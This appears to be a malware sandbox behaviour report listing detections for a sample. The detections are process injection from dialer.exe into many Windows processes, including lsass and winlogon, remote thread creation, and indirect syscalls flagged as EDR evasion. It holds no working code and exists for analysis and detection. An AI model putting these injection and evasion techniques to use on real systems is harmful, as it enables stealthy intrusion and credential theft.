Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B5644B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29166940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19E29CE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: C350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BFFC960000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FBA3250000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1D4C2220000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1F2989C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 25EEFAE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 17644530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BCF4530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1B0BB950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Recovery\WmiPrvSE.exe base: 1B4E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Recovery\WmiPrvSE.exe base: 13C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 150E9040000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 267FCE60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\PING.EXE base: 2359B4F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Recovery\RuntimeBroker.exe base: 1BD70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Recovery\RuntimeBroker.exe base: 1360000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

46_2_0000000140001C88

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C0AB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 612D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AF19273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8799273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5377273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D53273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 67D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5B38273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EBFD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5904273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9E7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7316273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 130273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4E86273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 473C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6F9D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 83BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D3F7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A415273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BDF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C026273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C9F3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 644B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B2A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4F6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2AB4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4ADB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 25DA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F535273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F0D6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FFB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C257273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8BCE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6694273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13EF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D57273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 69B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CC74273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5DA7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F389273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3B8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40E4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A653273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 29CE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B15273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 621A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F48273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B4B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 683D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C35273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2E26273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6C5E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D593273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC69273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7897273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D0A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB4C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A64273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 641A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4935273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 60D8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E7B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E815273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5234273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9DA9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 602E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 99A1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC96273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A325273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C222273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 989C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EFAE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 39DB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4453273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2C42273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F453273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BB95273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D26C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1E7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2D9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E904273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FCE6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9B4F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1BD7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 136273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 66A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5C1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 66A273C

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateValueKey: Indirect: 0x2DC293D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateValueKey: Indirect: 0x2DC290E
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtQuerySystemInformation: Indirect: 0x1ED3205D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateValueKey: Indirect: 0x1ED3290E
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtDeviceIoControlFile: Indirect: 0x1ED32B9D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateValueKey: Indirect: 0x1ED3293D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtQuerySystemInformation: Indirect: 0x1ED32F57
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtResumeThread: Indirect: 0x1ED3231E
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateKey: Indirect: 0x1ED32842
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateKey: Indirect: 0x1ED32875

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAF190000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E29CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: C350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BFFC960000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FBA3250000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D4C2220000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1F2989C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 25EEFAE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000 value starts with: 4D5A
